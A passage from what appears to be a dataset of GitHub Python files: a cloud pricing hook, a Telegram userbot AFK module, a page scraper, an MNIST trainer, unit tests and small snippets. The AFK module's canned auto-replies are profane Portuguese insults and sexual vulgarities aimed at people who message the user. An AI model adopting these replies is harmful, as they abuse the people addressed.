number..\")\n\n\n\n\n\nmain()\n\n\n\n\n\n\n\n\n","repo_name":"lakshayrajput/Instabot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15506520430","text":"\"\"\"\nCalculates the on-demand rate for the chosen IBM instance type.\n\nRate is displayed in the time units chosen in Rates Options. Assumes the\ncurrency is USD, edit this action to change it.\n\nThis file is applied when provisioning a server.\nThese rates are updated regularly by the 'Refresh Server Rates' recurring job.\n\"\"\"\n\n\nfrom decimal import Decimal\nimport os.path\nimport ijson\nimport json\nimport time\nimport re\nimport requests\n\nfrom multiprocessing import Process, Queue\n\nfrom django.conf import settings\nfrom django.core.cache import cache\n\nimport SoftLayer\n\nfrom costs.utils import default_compute_rate\nfrom resourcehandlers.aws.aws_wrapper import get_region_title\nfrom resourcehandlers.aws.models import AWSHandler\nfrom utilities.filesystem import mkdir_p\nfrom utilities.logger import ThreadLogger\nfrom utilities.models import GlobalPreferences\n\nNUMBER_OF_HOURS = {\n \"HOUR\": 1,\n \"DAY\": 24,\n \"WEEK\": 192,\n \"MONTH\": 720, # assumes 30-day month\n \"YEAR\": 8760, # assumes 365-day year\n}\n\nlogger = ThreadLogger(__name__)\n\ndef get_client(environment):\n resource_handler = environment.resource_handler\n api_kwargs = {\n \"username\": resource_handler.serviceaccount,\n \"api_key\": str(resource_handler.servicepasswd),\n }\n client = SoftLayer.create_client_from_env(**api_kwargs)\n return client\n\ndef get_price(environment, cpus, memory):\n client = get_client(environment)\n manager = SoftLayer.OrderingManager(client)\n if cpus == 1:\n cpu = 'GUEST_CORE_' + str(cpus)\n else:\n cpu = 'GUEST_CORES_' + str(cpus)\n memory = 'RAM_' + str(memory) +'_GB'\n\n try:\n location_groups = [data_center['groups'] for data_center in client.call('SoftLayer_Location', 'getDatacenters', mask='groups') if data_center['name'] == environment.slayer_datacenter]\n location_group_ids = []\n for location_group in location_groups:\n for location in location_group:\n location_group_ids.append(location['id'])\n\n item_prices = client.call('SoftLayer_Product_Package', 'getItemPrices', id=835)\n\n cpu_cost = [float(cost['hourlyRecurringFee']) for cost in item_prices if (cost['locationGroupId'] in location_group_ids and cost['item'].get('keyName') == cpu)][0]\n memory_cost = [float(cost['hourlyRecurringFee']) for cost in item_prices if (cost['locationGroupId'] in location_group_ids and cost['item'].get('keyName') == memory)][0]\n total_cost = cpu_cost + memory_cost\n return total_cost\n except Exception as e:\n print('-------------------------')\n print(e)\n return 0\n\ndef compute_rate(group, environment, resource_technology, cfvs, pcvss,\n os_build, apps, quantity=1, **kwargs):\n\n override_defaults = kwargs.pop(\"override_defaults\", False)\n\n if override_defaults:\n # This is also useful for testing to check whether we returned rates just from IBM.\n logger.info(f\"Only including IBM-specific rates from the IBM rate hook.\")\n rate_dict = {}\n else:\n # The rate_dict below will include any Software or Extra rates from the Admin/Rates settings.\n # You can modify this file to exclude these rates.\n rate_dict = default_compute_rate(\n group,\n environment,\n resource_technology,\n cfvs,\n pcvss,\n os_build,\n apps,\n quantity,\n **kwargs,\n )\n # Override Hardware rates for consistency; so that we don't return the\n # default CPU/Disk Rates, which would be misleading about whether we got the\n # rate from IBM.\n rate_dict.update({\"Hardware\": {}})\n logger.info(f\"Including the default Admin/rates in the IBM rate hook.\")\n\n server_preset = []\n for cfv in cfvs:\n if cfv.field.name == 'cpu_cnt':\n cpus = cfv.value\n if cfv.field.name == 'mem_size':\n memory = cfv.value\n rate = get_price(environment, cpus, memory)\n\n rate_time_unit = GlobalPreferences.objects.get().rate_time_unit\n number_of_hours = NUMBER_OF_HOURS.get(rate_time_unit, 0)\n rate_dict.update({\n \"Hardware\": {\n \"Instance Type\": Decimal(rate)\n },\n })\n return rate_dict\n\n# [p for p in manager.get_item_prices(835) if (p['locationGroupId'] is not None and p['item'].get('units') == 'CORE')]\n# [preset for preset in client.call('SoftLayer_Product_Package_Preset', 'getAllObjects') if (preset['keyName'].startswith(\"B1\") and preset['keyName'].endswith('25'))]\n\n# mlist = []\n# for i in [k['groups'] for k in client.call('SoftLayer_Location', 'getDatacenters', mask='groups') if k['name'] == 'ams01']:\n# for l in i:\n# mlist.append(l['id'])\n\n# item_prices = client.call('SoftLayer_Product_Package', 'getItemPrices', id=835, filter={\"locationgroupid\": 503})\n\n# cpu_cost = [float(p['hourlyRecurringFee']) for p in item_prices if (p['locationGroupId'] in [68, 2, 503] and p['item'].get('keyName') == 'GUEST_VCORE_2')]\n# memory_cost = [float(p['hourlyRecurringFee']) for p in item_prices if (p['locationGroupId'] in [68, 2, 503] and p['item'].get('keyName') == 'RAM_2_GB')][0]\n\n# cpu_cost = [float(p['hourlyRecurringFee']) for p in item_prices if (p['locationGroupId'] in [68, 2, 503] and p['item'].get('keyName') == 'GUEST_4_VCORES')][0]\n# memory_cost = [float(p['hourlyRecurringFee']) for p in item_prices if (p['locationGroupId'] in [68, 2, 503] and p['item'].get('keyName') == 'RAM_8_GB')][0]\n\n# print(cpu_cost + memory_cost)\n\n# def x():\n# for preset in presets:\n# if [int(server_value) for server_value in preset['keyName'].split('_')[1].split('X')[:2]] == server_values:\n# print(sum([float(price['hourlyRecurringFee']) for price in manager.get_preset_prices(preset['id'])['prices']]))","repo_name":"rnjane/boan","sub_path":"boanapp/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6229224292","text":"import time\nfrom datetime import datetime\nfrom random import choice\n\nfrom telethon.events import StopPropagation\n\nfrom userbot import CMD_HELP # noqa\nfrom userbot.events import register\n\nfrom userbot import ( # noqa pylint: disable=unused-import isort:skip\n AFKREASON,\n BOTLOG,\n BOTLOG_CHATID,\n CMD_HELP,\n COUNT_MSG,\n ISAFK,\n PM_AUTO_BAN,\n USERS,\n)\n\n# ========================= CONSTANTS ============================\nAFKSTR = [\n \"Estou no modo baiano fdp nao me \",\n \"Estou no modo baiano fdp para de me incomoda\",\n \"Filha da puta tá vendo que eu tô em afk caraio.\",\n \"Vai se fode estou em afk pare de me mencionar !.\",\n \"Espera eu voltar arrombado !.\",\n \"Si continuar me mencionando eu vou comer teu cu eu tou em afk fdp\",\n \"Estou baianando pode esperar o pai cair da rede.\",\n \"Desculpa ae fml o pai n tá on !.\",\n \"Si for o kadso que tiver me mencionando vai tomar no cu.\",\n \"Tô em afk agora !\",\n \"AAAAAAAAAAAAAAAAAAAAAA FILHA DA PUTA EU TO OFF DESGRAÇA\",\n \"Si for o junin que tiver me marcando vai tomar no cu.\",\n \"Eu fui comer seu cu\\n---->\",\n \"Eu fui voltei ta um oco agora\\n<----\",\n \"Ado ado quem me chamou e viado.\",\n \"Fodase kadso eu estou em afk\",\n \"Oi estou em afk gostosa por favor n me chamar ok ?\",\n \"Seu cu\",\n \"Lmao. \",\n \"ok depois eu ti como\",\n \"To no zapzap!\",\n \"to cagando arrombado..\",\n \"ate?\",\n]\n\nglobal USER_AFK # pylint:disable=E0602\nglobal afk_time # pylint:disable=E0602\nglobal afk_start\nglobal afk_end\nUSER_AFK = {}\nafk_time = None\nafk_start = {}\n\n# =================================================================\n\n\n@register(outgoing=True, pattern=\"^.afk(?: |$)(.*)\", disable_errors=True)\nasync def set_afk(afk_e):\n \"\"\" For .afk command, allows you to inform people that you are afk when they message you \"\"\"\n afk_e.text\n string = afk_e.pattern_match.group(1)\n global ISAFK\n global AFKREASON\n global USER_AFK # pylint:disable=E0602\n global afk_time # pylint:disable=E0602\n global afk_start\n global afk_end\n global reason\n USER_AFK = {}\n afk_time = None\n afk_end = {}\n start_1 = datetime.now()\n afk_start = start_1.replace(microsecond=0)\n if string:\n AFKREASON = string\n await afk_e.edit(\n f\"Ativei o modo baiano!\\\n \\nRazão: `{string}`\"\n )\n else:\n await afk_e.edit(\"Ativei o modo baiano!\")\n if BOTLOG:\n await afk_e.client.send_message(BOTLOG_CHATID, \"#AFK\\nVocê ficou ausente!\")\n ISAFK = True\n afk_time = datetime.now() # pylint:disable=E0602\n raise StopPropagation\n\n\n@register(outgoing=True)\nasync def type_afk_is_not_true(notafk):\n \"\"\" This sets your status as not afk automatically when you write something while being afk \"\"\"\n global ISAFK\n global COUNT_MSG\n global USERS\n global AFKREASON\n global USER_AFK # pylint:disable=E0602\n global afk_time # pylint:disable=E0602\n global afk_start\n global afk_end\n back_alive = datetime.now()\n afk_end = back_alive.replace(microsecond=0)\n if ISAFK:\n ISAFK = False\n msg = await notafk.respond(\"Não estou mais AFK.\")\n time.sleep(3)\n await msg.delete()\n if BOTLOG:\n await notafk.client.send_message(\n BOTLOG_CHATID,\n \"Você recebeu \"\n + str(COUNT_MSG)\n + \" mensagens de \"\n + str(len(USERS))\n + \" chats enquanto esteve fora\",\n )\n for i in USERS:\n name = await notafk.client.get_entity(i)\n name0 = str(name.first_name)\n await notafk.client.send_message(\n BOTLOG_CHATID,\n \"[\"\n + name0\n + \"](tg://user?id=\"\n + str(i)\n + \")\"\n + \" te enviou \"\n + \"`\"\n + str(USERS[i])\n + \" mensagens`\",\n )\n COUNT_MSG = 0\n USERS = {}\n AFKREASON = None\n\n\n@register(incoming=True, disable_edited=False)\nasync def mention_afk(mention):\n \"\"\" This function takes care of notifying the people who mention you that you are AFK.\"\"\"\n global COUNT_MSG\n global USERS\n global ISAFK\n global USER_AFK # pylint:disable=E0602\n global afk_time # pylint:disable=E0602\n global afk_start\n global afk_end\n back_alivee = datetime.now()\n afk_end = back_alivee.replace(microsecond=0)\n afk_since = \"algum tempo atrás\"\n if mention.message.mentioned and not (await mention.get_sender()).bot:\n if ISAFK:\n now = datetime.now()\n datime_since_afk = now - afk_time # pylint:disable=E0602\n time = float(datime_since_afk.seconds)\n days = time // (24 * 3600)\n time = time % (24 * 3600)\n hours = time // 3600\n time %= 3600\n minutes = time // 60\n time %= 60\n seconds = time\n if days == 1:\n afk_since = \"Ontem\"\n elif days > 1:\n if days > 6:\n date = now + datetime.timedelta(\n days=-days, hours=-hours, minutes=-minutes\n )\n afk_since = date.strftime(\"%A, %Y %B %m, %H:%I\")\n else:\n wday = now + datetime.timedelta(days=-days)\n afk_since = wday.strftime(\"%A\")\n elif hours > 1:\n afk_since = f\"`{int(hours)}h{int(minutes)}m`\"\n elif minutes > 0:\n afk_since = f\"`{int(minutes)}m{int(seconds)}s`\"\n else:\n afk_since = f\"`{int(seconds)}s`\"\n if AFKREASON:\n await mention.reply(\n f\"Estou ausente fazem {afk_since}.\\\n \\nRazão: `{AFKREASON}`\"\n )\n else:\n await mention.reply(str(choice(AFKSTR)))\n USERS.update({mention.sender_id: 1})\n COUNT_MSG = COUNT_MSG + 1\n\n\n@register(incoming=True, disable_errors=True)\nasync def afk_on_pm(sender):\n \"\"\" Function which informs people that you are AFK in PM \"\"\"\n global ISAFK\n global USERS\n global COUNT_MSG\n global COUNT_MSG\n global USERS\n global ISAFK\n global USER_AFK # pylint:disable=E0602\n global afk_time # pylint:disable=E0602\n global afk_start\n global afk_end\n back_alivee = datetime.now()\n afk_end = back_alivee.replace(microsecond=0)\n afk_since = \"algum tempo atrás\"\n if (\n sender.is_private\n and sender.sender_id != 777000\n and not (await sender.get_sender()).bot\n ):\n if PM_AUTO_BAN:\n try:\n from userbot.modules.sql_helper.pm_permit_sql import is_approved\n\n apprv = is_approved(sender.sender_id)\n except AttributeError:\n apprv = True\n else:\n apprv = True\n if apprv and ISAFK:\n now = datetime.now()\n datime_since_afk = now - afk_time # pylint:disable=E0602\n time = float(datime_since_afk.seconds)\n days = time // (24 * 3600)\n time = time % (24 * 3600)\n hours = time // 3600\n time %= 3600\n minutes = time // 60\n time %= 60\n seconds = time\n if days == 1:\n afk_since = \"Ontem\"\n elif days > 1:\n if days > 6:\n date = now + datetime.timedelta(\n days=-days, hours=-hours, minutes=-minutes\n )\n afk_since = date.strftime(\"%A, %Y %B %m, %H:%I\")\n else:\n wday = now + datetime.timedelta(days=-days)\n afk_since = wday.strftime(\"%A\")\n elif hours > 1:\n afk_since = f\"`{int(hours)}h{int(minutes)}m`\"\n elif minutes > 0:\n afk_since = f\"`{int(minutes)}m{int(seconds)}s`\"\n else:\n afk_since = f\"`{int(seconds)}s`\"\n if AFKREASON:\n await sender.reply(\n f\"Estou ausente fazem {afk_since}.\\\n \\nRazão: `{AFKREASON}`\"\n )\n else:\n await sender.reply(str(choice(AFKSTR)))\n USERS.update({sender.sender_id: 1})\n COUNT_MSG = COUNT_MSG + 1\n\n\nCMD_HELP.update(\n {\n \"afk\": \".afk [Motivo Opcional]\\\n\\nUso: Define você como ausente.\\nResponde qualquer pessoa que envia PMs/marca \\\nvocê e diz o motivo da ausência(razão).\\n\\nDesliga o AUSENTE quando digitar qualquer coisa, em qualquer lugar.\\\n\"\n }\n)\n","repo_name":"JoanLindo/BaianoBotv5","sub_path":"userbot/modules/afk.py","file_name":"afk.py","file_ext":"py","file_size_in_byte":8726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"31642200288","text":"#!/usr/bin/python\r\n#coding:utf-8\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport unicodecsv as csv\r\nimport re\r\n\r\n\r\nsave_file_name = \"result_all_3_multithreading-200-1.csv\"\r\nproxies = {\r\n \"http\": \"http://localhost:8080\",\r\n \"https\": \"http://localhost:8080\",\r\n}\r\n\r\nheaders = {\r\n \"Host\": \"47.52.164.88\",\r\n \"Origin\": \"http://47.52.164.88\",\r\n \"X-Requested-With\": \"XMLHttpRequest\",\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\",\r\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\r\n \"Referer\": \"http://www.baidu.com\",\r\n \"Accept\": \"*/*\",\r\n \"Accept-Encoding\": \"gzip, deflate\",\r\n \"Accept-Language\": \"zh-CN,zh;q=0.9,en;q=0.8\",\r\n \"Connection\": \"close\"\r\n}\r\n\r\ndef get_pages(id):\r\n url = \"http://47.52.164.88/test5.php?id=\"+str(id)\r\n try:\r\n # print 'crawlling: '+str(id)\r\n r = requests.get(url, proxies=proxies,headers=headers)\r\n # r = requests.get(url,headers=headers)\r\n result = r.content.decode('utf-8')\r\n except requests.exceptions.RequestException as e:\r\n print(e)\r\n print('retring'+str(id))\r\n return result\r\n\r\ndef parse_response(response):\r\n soup = BeautifulSoup(response,'lxml')\r\n #get course numbers\r\n course_all_num_string = soup.find('span',class_=\"course-all-num\").string\r\n #get the exact value from the whole string\r\n course_all_num = str(re.findall(r'\\d+',course_all_num_string)[0])\r\n #get course prices\r\n price = soup.find('span',class_='price').find_all('span')\r\n price_value = \"\"\r\n for span in price:\r\n price_value += span.string\r\n \r\n return course_all_num,price_value\r\n\r\n\r\n\r\n\r\ndef main():\r\n for i in range(1,21):\r\n response = get_pages(i)\r\n classnum,price = parse_response(response)\r\n print('id:',str(i),' classnum: ',classnum,' price: ',price)\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"malongge/crawler","sub_path":"spider-7-css-1.py","file_name":"spider-7-css-1.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18949212019","text":"# coding: utf-8\n\n# checking for already existing files\nimport os\n# downloading/extracting mnist data\nimport gzip\nimport random # normal distirbution sampling\nfrom tqdm import tqdm # visualising progress\nimport numpy as np # loading data from buffer\n\nfrom fetch.math.linalg import MatrixDouble # our matrices\nfrom utils import * # activation functions\n\n\nclass MnistLearner():\n\n def __init__(self):\n\n self.data_url = 'http://yann.lecun.com/exdb/mnist/'\n\n self.x_tr_filename = 'train-images-idx3-ubyte.gz'\n self.y_tr_filename = 'train-labels-idx1-ubyte.gz'\n self.x_te_filename = 't10k-images-idx3-ubyte.gz'\n self.y_te_filename = 't10k-labels-idx1-ubyte.gz'\n\n self.training_size = 10000\n self.validation_size = 10000\n\n self.n_epochs = 30\n self.batch_size = 50\n self.alpha = 0.2\n\n self.mnist_input_size = 784 # pixels in 28 * 28 mnist images\n self.mnist_output_size = 10 # 10 possible characters to recognise\n\n self.activation_fn = 'relu'\n self.layers = [20]\n\n self.initialise_network()\n\n def initialise_network(self):\n\n # definition of the network layers\n self.net = []\n for i in range(len(self.layers)):\n self.net.append(self.layers[i])\n self.net.append(self.mnist_output_size)\n\n # instantiate the network weights once\n self.weights = [self.make_new_layer(\n self.mnist_input_size, self.net[0])]\n if len(self.net) > 2:\n for i in range(len(self.net) - 2):\n self.weights.append(self.make_new_layer(\n self.net[i], self.net[i + 1]))\n self.weights.append(self.make_new_layer(self.net[-2], self.net[-1]))\n\n # instantiate the gradients container once (and a temporary storage for\n # updates\n self.grads = []\n for i in range(len(self.weights)):\n self.grads.append(MatrixDouble(\n self.weights[i].height(), self.weights[i].width()))\n self.temp_grads = []\n for i in range(len(self.weights)):\n self.temp_grads.append(MatrixDouble(\n self.weights[i].height(), self.weights[i].width()))\n\n # pre-instantiate constant set of zeroed matrices for relu comparisons\n\n self.const_zeros = []\n for idx in range(len(self.weights)):\n if idx == 0:\n self.const_zeros.append(MatrixDouble.Zeros(\n self.batch_size, self.weights[idx].width()))\n else:\n self.const_zeros.append(\n MatrixDouble.Zeros(\n self.const_zeros[idx - 1].height(),\n self.weights[idx].width()))\n\n return\n\n def make_new_layer(self, in_size, out_size, mode='normal'):\n '''\n makes a new MLP layer\n :param in_size:\n :param out_size:\n :param mode:\n :return:\n '''\n denom = np.sqrt(in_size)\n layer = MatrixDouble(in_size, out_size)\n for i in range(layer.size()):\n if mode == 'constant': # constant values - for debugging\n layer[i] = 1.0 / denom\n if mode == 'uniform': # random uniform - our library\n layer[i] = (random.uniform(-1.0, 1.0)) / denom\n if mode == 'normal': # random normal distribution\n layer[i] = np.random.normal(0, 1) / denom\n return layer\n\n def load_data(self, one_hot=True, reshape=None):\n x_tr = self.load_images(self.x_tr_filename, self.training_size)\n y_tr = self.load_labels(self.y_tr_filename, self.training_size)\n x_te = self.load_images(self.x_te_filename, self.validation_size)\n y_te = self.load_labels(self.y_te_filename, self.validation_size)\n\n if one_hot:\n y_tr_onehot = MatrixDouble.Zeros(\n y_tr.height(), self.mnist_output_size)\n y_te_onehot = MatrixDouble.Zeros(\n y_te.height(), self.mnist_output_size)\n\n for i in range(len(y_tr)):\n y_tr_onehot[i, int(y_tr[i])] = 1\n for i in range(len(y_te)):\n y_te_onehot[i, int(y_te[i])] = 1\n\n if reshape:\n x_tr, x_te = [x.reshape(*reshape) for x in (x_tr, x_te)]\n\n if one_hot:\n self.y_tr = y_tr_onehot\n self.y_te = y_te_onehot\n else:\n self.y_tr = y_tr\n self.y_te = y_te\n self.x_tr = x_tr\n self.x_te = x_te\n\n def load_images(self, filename, data_size):\n self.download(filename)\n with gzip.open(filename, 'rb') as f:\n data = np.frombuffer(f.read(), np.uint8, offset=16)\n data = data.reshape(-1, 28 * 28) / 256\n nd_data = MatrixDouble(data_size, 28 * 28)\n nd_data.FromNumpy(data[:data_size, :])\n return nd_data\n\n def load_labels(self, filename, data_size):\n self.download(filename)\n with gzip.open(filename, 'rb') as f:\n data = np.frombuffer(f.read(), np.uint8, offset=8)\n data.reshape(np.shape(data)[0], -1)\n nd_data = MatrixDouble(data_size, 1)\n nd_data.FromNumpy(data[:data_size].reshape(data_size, -1))\n return nd_data\n\n def download(self, filename):\n if not os.path.exists(filename):\n from urllib.request import urlretrieve\n print(\"Downloading %s\" % filename)\n urlretrieve(self.data_url + filename, filename)\n\n return\n\n # feed forward pass of a network\n # take X input and the network (defined as a list of weights)\n # no biases?\n def feed_forward(self, X):\n\n a = [X]\n for idx in range(len(self.weights)):\n temp = MatrixDouble(a[-1].height(), self.weights[idx].width())\n temp = temp.Dot(a[-1], self.weights[idx])\n if self.activation_fn == 'relu':\n if ((self.const_zeros[idx].height() == temp.height()) and (\n self.const_zeros[idx].width() == temp.width())):\n temp = relu(temp, self.const_zeros[idx])\n else:\n temp = relu(temp, MatrixDouble.Zeros(\n temp.height(), temp.width()))\n\n elif self.activation_fn == 'sigmoid':\n temp = sigmoid(temp)\n else:\n print(\"unspecified activation functions!!\")\n raise ValueError()\n a.append(temp)\n return a\n\n # get the gradients of the network\n def update_weights(self, X, Y):\n\n # run a forward pass to get delta\n a = self.feed_forward(X)\n last_delta = a[-1] - Y # cross-entropy\n\n # calculate grads\n self.grads[-1] = self.grads[-1].TransposeDot(a[-2], last_delta)\n for i in range(len(a) - 2, 0, -1):\n # TODO: This dotTranspose gives a different answer from numpy;\n # probably because of Array Major Order\n new_delta = MatrixDouble(\n last_delta.height(), self.weights[i].height())\n new_delta.DotTranspose(last_delta, self.weights[i])\n if self.activation_fn == 'sigmoid':\n new_delta *= d_sigmoid(a[i])\n elif self.activation_fn == 'relu':\n new_delta *= (a[i] >= self.const_zeros[i - 1])\n else:\n raise ValueError()\n self.grads[i - 1] = self.grads[i -\n 1].TransposeDot(a[i - 1], new_delta)\n\n last_delta = new_delta\n\n # divide grads by batch size\n for i in range(len(self.grads)):\n self.grads[i] /= X.height()\n\n for i in range(len(self.weights)):\n self.weights[i] -= (self.grads[i] * self.alpha)\n\n return\n\n def train(self):\n\n X = MatrixDouble(self.batch_size, self.mnist_input_size)\n Y = MatrixDouble(self.batch_size, self.mnist_output_size)\n\n # epochs\n for i in range(self.n_epochs):\n print(\"epoch \", i, \": \")\n\n # training batches\n for j in tqdm(range(0, self.x_tr.height() -\n self.batch_size, self.batch_size)):\n\n # assign X batch\n for k in range(self.batch_size):\n for l in range(28 * 28):\n X[k, l] = self.x_tr[j + k, l]\n\n # assign Y batch\n for k in range(self.batch_size):\n for l in range(10):\n Y[k, l] = self.y_tr[j + k, l]\n\n # update weights\n self.update_weights(X, Y)\n\n temp = self.weights[0].Copy()\n temp.Abs()\n\n print(\"Getting accuracy: \")\n print(\"\\t getting feed forward predictions..\")\n cur_pred = self.feed_forward(self.x_te)[-1]\n\n print(\"\\t calculating argmaxes\")\n max_pred = cur_pred.ArgMax(1)\n gt = self.y_te.ArgMax(1)\n\n print(\"\\t comparing Y & Y^\")\n sum_acc = 0\n for i in range(self.y_te.height()):\n sum_acc += (gt[i] == max_pred[i])\n sum_acc /= self.y_te.height()\n\n print(\"\\taccuracy: \", sum_acc)\n\n return\n\n\ndef run_mnist():\n\n mlearner = MnistLearner()\n\n # load the data\n mlearner.load_data(one_hot=True)\n\n # being training\n mlearner.train()\n\n\n# import cProfile\n# cProfile.run('run_mnist()')\nrun_mnist()\n","repo_name":"fetchai/ledger","sub_path":"scripts/python_ml_lib/mnist_example/mnist_linalg_matrix_hand_coded_graph.py","file_name":"mnist_linalg_matrix_hand_coded_graph.py","file_ext":"py","file_size_in_byte":9577,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"78"} +{"seq_id":"13086994685","text":"import math\n\nclass Solution:\n def minCostClimbingStairs(self, cost: List[int]) -> int:\n clen = len(cost)+1\n minCost = [math.inf]*(clen)\n minCost[0]=minCost[1]=0\n for i in range(2,clen):\n minCost[i]=min((minCost[i-2]+cost[i-2]),(minCost[i-1]+cost[i-1]))\n return minCost[clen-1]","repo_name":"ragilr/leetcode","sub_path":"lcc-june2021/min-cost-climbing-stairs.py","file_name":"min-cost-climbing-stairs.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73073020411","text":"#!/usr/bin/python3\n\"\"\"unittests for base model\"\"\"\nimport unittest\nimport os\nimport uuid\nimport json\n\nfrom unittest.mock import patch\nfrom datetime import datetime, timedelta\nfrom models.base_model import BaseModel\nfrom models import storage\n\n\nclass TestBaseModel(unittest.TestCase):\n def setUp(self):\n self.base_model = BaseModel()\n\n def test_no_args_instantiates(self):\n self.assertEqual(BaseModel, type(BaseModel()))\n\n def test_id_is_public_str(self):\n self.assertEqual(str, type(BaseModel().id))\n\n def test_created_at_is_public_datetime(self):\n self.assertEqual(datetime, type(BaseModel().created_at))\n\n def test_updated_at_is_public_datetime(self):\n self.assertEqual(datetime, type(BaseModel().updated_at))\n\n def test_two_models_unique_ids(self):\n bm1 = BaseModel()\n bm2 = BaseModel()\n self.assertNotEqual(bm1.id, bm2.id)\n\n def test_str_representation(self):\n dt = datetime.today()\n dt_repr = repr(dt)\n bm = BaseModel()\n bm.id = \"123456\"\n bm.created_at = bm.updated_at = dt\n bmstr = bm.__str__()\n self.assertIn(\"[BaseModel] (123456)\", bmstr)\n self.assertIn(\"'id': '123456'\", bmstr)\n self.assertIn(\"'created_at': \" + dt_repr, bmstr)\n self.assertIn(\"'updated_at': \" + dt_repr, bmstr)\n\n def test_args_unused(self):\n bm = BaseModel(None)\n self.assertNotIn(None, bm.__dict__.values())\n\n def test_instantiation_with_kwargs(self):\n dt = datetime.today()\n dt_iso = dt.isoformat()\n bm = BaseModel(id=\"345\", created_at=dt_iso, updated_at=dt_iso)\n self.assertEqual(bm.id, \"345\")\n self.assertEqual(bm.created_at, dt)\n self.assertEqual(bm.updated_at, dt)\n\n def test_instantiation_with_None_kwargs(self):\n with self.assertRaises(TypeError):\n BaseModel(id=None, created_at=None, updated_at=None)\n\n def test_instantiation_with_args_and_kwargs(self):\n dt = datetime.today()\n dt_iso = dt.isoformat()\n bm = BaseModel(\"12\", id=\"345\", created_at=dt_iso, updated_at=dt_iso)\n self.assertEqual(bm.id, \"345\")\n self.assertEqual(bm.created_at, dt)\n self.assertEqual(bm.updated_at, dt)\n\n def tearDown(self):\n pass\n\n def test_attributes_existence(self):\n self.assertTrue(hasattr(self.base_model, 'id'))\n self.assertTrue(hasattr(self.base_model, 'created_at'))\n self.assertTrue(hasattr(self.base_model, 'updated_at'))\n\n def test_id_is_unique(self):\n b = BaseModel()\n self.assertNotEqual(b, self.base_model)\n\n def test_id_is_uuid(self):\n self.assertTrue(isinstance(self.base_model.id, str))\n try:\n uuid.UUID(self.base_model.id, version=4)\n except ValueError:\n self.fail(\"id is not a valid UUID\")\n\n def test_id_string(self):\n self.assertEqual(str, type(self.base_model.id))\n\n def test_created_at(self):\n self.assertIsInstance(self.base_model.created_at, datetime)\n\n def test_updated_at(self):\n self.assertIsInstance(self.base_model.updated_at, datetime)\n\n def test_save_method(self):\n original_updated_at = self.base_model.updated_at\n self.base_model.save()\n self.assertNotEqual(self.base_model.updated_at, original_updated_at)\n\n def test_save_with_arg(self):\n bm = BaseModel()\n with self.assertRaises(TypeError):\n bm.save(None)\n\n def test_save_updates_file(self):\n bm = BaseModel()\n bm.save()\n bmid = \"BaseModel.\" + bm.id\n with open(\"file.json\", \"r\") as f:\n self.assertIn(bmid, f.read())\n\n def test_save_saves_to_file(self):\n self.base_model.save()\n with open(\"file.json\", 'r', encoding='utf-8') as file:\n data = json.load(file)\n\n key = \"{}.{}\".format(\"BaseModel\", self.base_model.id)\n self.assertIn(key, data)\n\n def to_dict(self):\n obj_dict = self.__dict__.copy()\n obj_dict['__class__'] = self.__class__.__name__\n\n # Convert created_at and updated_at to ISO format strings\n if isinstance(self.created_at, datetime):\n obj_dict['created_at'] = self.created_at.isoformat()\n if isinstance(self.updated_at, datetime):\n obj_dict['updated_at'] = self.updated_at.isoformat()\n\n return obj_dict\n\n def test_to_dict_contains_correct_keys(self):\n bm = BaseModel()\n self.assertIn(\"id\", bm.to_dict())\n self.assertIn(\"created_at\", bm.to_dict())\n self.assertIn(\"updated_at\", bm.to_dict())\n self.assertIn(\"__class__\", bm.to_dict())\n\n def test_to_dict_contains_added_attributes(self):\n bm = BaseModel()\n bm.name = \"Holberton\"\n bm.my_number = 98\n self.assertIn(\"name\", bm.to_dict())\n self.assertIn(\"my_number\", bm.to_dict())\n\n def test_to_dict_datetime_attributes_are_strs(self):\n bm = BaseModel()\n bm_dict = bm.to_dict()\n self.assertEqual(str, type(bm_dict[\"created_at\"]))\n self.assertEqual(str, type(bm_dict[\"updated_at\"]))\n\n def test_to_dict_output(self):\n dt = datetime.today()\n bm = BaseModel()\n bm.id = \"123456\"\n bm.created_at = bm.updated_at = dt\n tdict = {\n 'id': '123456',\n '__class__': 'BaseModel',\n 'created_at': dt.isoformat(),\n 'updated_at': dt.isoformat()\n }\n self.assertDictEqual(bm.to_dict(), tdict)\n\n def test_to_dict_with_arg(self):\n bm = BaseModel()\n with self.assertRaises(TypeError):\n bm.to_dict(None)\n\n def test_str_method(self):\n strn = f\"[BaseModel] ({self.base_model.id}) {self.base_model.__dict__}\"\n self.assertEqual(str(self.base_model), strn)\n\n @patch('models.base_model.storage')\n def test_init_with_kwargs(self, mock_storage):\n kwargs = {\n 'id': 'some_id',\n 'created_at': '2023-08-09T06:23:27.276770',\n 'updated_at': '2023-08-09T06:23:27.276770',\n 'name': 'My_Model',\n '__class__': 'BaseModel'\n }\n new_model = BaseModel(**kwargs)\n\n self.assertEqual(new_model.id, 'some_id')\n self.assertEqual(new_model.name, 'My_Model')\n\n def test_new_in_init(self):\n objects = storage.all()\n self.assertEqual(dict, type(objects))\n key = \"{}.{}\".format(\"BaseModel\", self.base_model.id)\n self.assertIn(key, objects)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Tgithinji/AirBnB_clone","sub_path":"tests/test_models/test_base_model.py","file_name":"test_base_model.py","file_ext":"py","file_size_in_byte":6511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41185838912","text":"from django.conf.urls import url, include\n\nfrom ecommerce import views\nfrom pages.urls import 